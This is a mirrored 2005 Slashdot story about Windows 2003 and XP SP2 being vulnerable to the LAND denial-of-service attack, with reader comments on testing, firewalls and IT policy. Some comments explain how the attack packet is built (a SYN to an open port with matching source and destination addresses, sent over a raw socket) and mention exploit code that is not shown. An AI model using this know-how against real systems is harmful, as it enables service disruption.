Slashdot Mirror

← Back to Stories (view on slashdot.org)

Windows 2003 and XP SP2 Vulnerable To LAND Attack

Posted by Hemos on from the one-if-by-sea-two-if-by-LAND dept.

An anonymous reader writes "Dejan Levaja, a Serbian security engineer has discovered that nearly 8 years after the attack was first made public, WIndows 2003 and Windows XP SP2 are in fact vulnerable to the historic LAND attack." Granted, you need to have the firewall turned off for this work, but there's a whole lotta machines that don't have it turned on.

14 of 534 comments (clear)

  1. Only win ? by mirko · · Score: 4, Interesting

    Are only Windows platform vulnerable or will these attacks be successful on other non-ms platforms ?

    --
    Trolling using another account since 2005.
    1. Re:Only win ? by ip_fired · · Score: 3, Interesting

      I compiled land.c on linux and and then had it test my powerbook (OS X.3.8) on an open port. Nothing happened, thus it's not exploitable.

      If anyone is interested, I had to modify the program to get it to work in linux (the structures have changed since this was originally written).

      Here is a patch so you can test other OSes.

      land.diff

      Curse you slashcode! It won't let me inline the patch. Oh well. Download it if you want it.

      --
      Don't count your messages before they ACK.
  2. What kind of software dev process do MS use? by Ex+Machina · · Score: 5, Interesting

    Isn't this EXACTLY what regression tests were designed for?

    1. Re:What kind of software dev process do MS use? by KDN · · Score: 5, Interesting
      Several jobs ago, the I did software development. The manager didn't like how every time I found a significant bug I added it to a test library that I kept and ran against every version of the code that I was about to put out to the group. His thought was "the odds of someone making the same mistake twice are non existent". One time he told me to put the code out before it was done the regression tests. Sure enough, crash and burn. And yes, my regression tests later caught the bug. Never again.

      As a further indication that I was right, I put an interface around the public interface of my libraries to validate all the parameters and actions. I noticed some people would make the same error so much that I even personalized some of the error messages. Like: "Your passing a string instead of an address John", and "Your reading from a closed object Kevin".

  3. On a more serious note.. by tabkey12 · · Score: 5, Interesting
    Blanket Attacks (like blaster, where every windows computer on the net with windows sharing on is hit about 6 times an hour) are usually only viable when the Default configuration is insecure.

    At least with SP2 there is some basic security in terms of the firewall being on by default.

    Still, never thought I'd see a slashdot article linking to a page about Trumpet Winsock in 2005!

    --
    Get a free iPod Nano 4GB!
  4. Can anyone confirm? by Anonymous Coward · · Score: 5, Interesting

    A friend showed this to me a few days ago and I was unable to reproduce the attack over the LAN, both with my own code and some code of the original LAND found with google. Both were run from linux by opening a raw socket, filling in ip and tcp headers including checksums using the structs in ip.h and tcp.h, and sending with sendto(). In both cases ethereal would show the packet as recieved but the machine would operate normally.

  5. Am I vulnerable? by SteelV · · Score: 3, Interesting

    I have yet to install SP2 because I heard it hurts performance of some computer games, which is mainly what I use my windows PC for.

    I am otherwise up-to-date with windows updates. I have a linksys router for my internet connection, but no software firewall.

    Am I vulnerable to this and other issues? Should I update to SP2 already (the first time I tried it crashed while installing, didn't even work, but I could prob. get it to work next time). Or should I stay with SP1 for games?

    Thank you.

  6. Re:Not that big of a deal by Dimensio · · Score: 4, Interesting

    I work in a university. Policy is not to have the Windows firewall turned on because it supposedly conflicts with a few needed applications. There is no hardware firewall whatsoever between the internal network and the outside world.

    Oh, and standard policy is to have user accounts set up as Administrator at all times.

    Cleaning up infected machines is a never-ending endeavour. Oddly, the few departments run by competent admins (as in, not the university's IT department) where user accounts are set up only as Users (among other things) don't have any security problems at all. I wonder why..

    Oh, and before anyone blames me: I'm a grunt with no authority whatsoever. I've voiced my objections to the way things are run, but I can do little more than that.

    --
    STOP MISUSING APOSTROPHES, YOU MORONS!!!
  7. Re:Little known fact by jd · · Score: 4, Interesting
    This is probably going to crack you up. Yes, they do. For secure communications, application serving, and (for the "intelligent" ships) navigation systems.


    There are people in the US Navy who are actively interested in Linux, but they are heavily outnumbered by fans of Windows and SCO Unix.

    --
    It's a small world and it smells funny; I'd buy another if it wasn't for the money; Take back what I paid (SoM)
  8. Damnit! by GoNINzo · · Score: 3, Interesting

    I pointed this out YEARS ago. I just don't understand why the updated winsock didn't get used in 2k when they overhauled the tcp stack. (and wow is that an old email addy. heh)

    --
    Gonzo Granzeau
    "Nothing the god of biomechanics wouldn't let you into heaven for.." -Roy Batty
  9. Re:News? by PyWiz · · Score: 3, Interesting

    Well, sure, as many people have pointed out, by disabling your firewall you are leaving yourself open to attacks. In addition, the LAND attack is merely a DOS attack and thus does not pose much threat to home computers (and servers would have firewalls).

    However, that is far from the point. The point is that 8 years after an attack was discovered, Microsofts commercial OS was STILL vulnerable to it. Obviously, if they're leaving themselves open to such vintage attacks as LAND, their security testing processes can't be all that great can they? What's there to assure us another more dangerous attack won't be discovered in the near future?

    At least in my opinion, this is yet another argument for open source. The MS developers that worked on this part of the code probably just threw some old stuff together and called it a day. The module was probably review by few other people and thus such an obvious vulnerabilty was released in the final product. With an open source product like Linux, this kind of stuff rarely if ever happens. So many people are scrutinizing the code that the chances of an obvious vuln going unnoticed are next to nothing.

    I guess what I'm saying is, before you leave your critical data to a company propogating closed source products like MS, you should at least make sure they have their proverbial shit together first.

    -py

    --
    -py
  10. Re:wow by Maestro4k · · Score: 4, Interesting
    but the reality is this vulnerability happened after SP2 was released.
    • Actually no, this vulnerability showed up 8 years ago and was patched in Windows 98 I believe. So this isn't something new that Microsoft is just now learning about and need to fix, it's something quite old. Since the vulnerability came out ME, 2000 and XP all were released.
    Perhaps they setup a firewall to allow them to fix things underneath without totally destroying everyone's networks?
    • If you're trying to say that MS feels that having the firewall on by default in XP SP2 is a shortcut for fixing problems, well, I certainly HOPE they're not taking that attitude. Yes the firewall needs to be on by default for better security, but they should have tested the OS against
    • known vulnerabilities with the firewall off to be certain they wouldn't work. Failure to do so shows some serious problems in MS land.
    When you have as large of an installbase as MS does you can't shift things right away or you will lose customers, you have to make changes slowly and incrimentally so that users don't get confused.
    • You seem royally confused about what this actually is. Land is a DOS attack that is caused by sending a SYN packet to an open port on a machine with the source and destination addresses the same. This isn't something that is _needed_ by any app, it's a TCP/IP oddity, a packet that would normally never occur. Back 8 years ago it was understandable that MS and others didn't anticipate this attack, but after 8 years there's not any excuse.

    • Simply this is not something users are going to notice the lack of. They'll certainly notice it's there if their machines gets hit with a Land attack though. It is NOT a case of MS trying to make changes slowly to not confuse customers, it's a big blunder.

    MS has been working a lot on connectivity over the last year or so with some protocol enhancements and increased IPv6 support. I imagine things are going to get worse before they get better, but don't kid yourself, they are working on fixing it.
    • Frankly if their "working on fixing it" involves re-introducing exploits first identified and fixed 8 YEARS ago then I'm certainly not going to hold my breath that they'll ever fix anything.

    • Ultimately though your defense of MS is unwarranted. They publically declared a while back (1-2 years now I think) that security was going to be a primary focus for them. This was pre-SP2 days. That they re-introduced a vulnerability from eight years ago speaks great volumes about that focus. If MS wants to claim they're security-focused now they deserve the lumps they get for foolish mistakes like this.

  11. Solaris 2.5.1? Yes, it's still about. by hot_Karls_bad_cavern · · Score: 4, Interesting

    Believe it or not, some folks still use Solaris 2.5 and 2.6 versions. I used to work at a university whose physics department was fortunate enough to have two electron scanning microscopes, one old and huge and one new, smaller one. The old one had controlling software that was custom, to say the least, and written by a German firm that's been out of business for a few years now.

    Guess what OS the software ran on? And what hardware connections were custom to the old Sparc-based controller the ran the thing? Wohoo! Old Solaris was the only way it'd still 'go'.

    Well, sneaker-net wasn't going to work for the grads that were abroad and well, the profs wanted network access, so they were going to get it. Short of the long, we had to build, tweak and mess with all kinds of junk (tcpwrappers, ssh, ssl) before it went back on the network (yes, that donkey had been hacked before). So yes, there's lots of old Solaris still out there.

    And before anyone asks, yes I finally quit that job due to *not* being able to secure things like this. Authenticating gateways, openvpn, pf on Solaris (boss would *never* let me put that on all the machines we cared for ... unbelievable really), moving *away* from Sendmail, installing Solaris machines with everything locked down, etc, etc). Drove me fucking mad.

  12. Linux version of the exploit by duncanthrax · · Score: 3, Interesting

    Yes, it actually works on SP2. Fire up Task Manager and watch CPU load reach 100% for ~10 seconds for a single packet.

    Here's the code that should compile on Linux.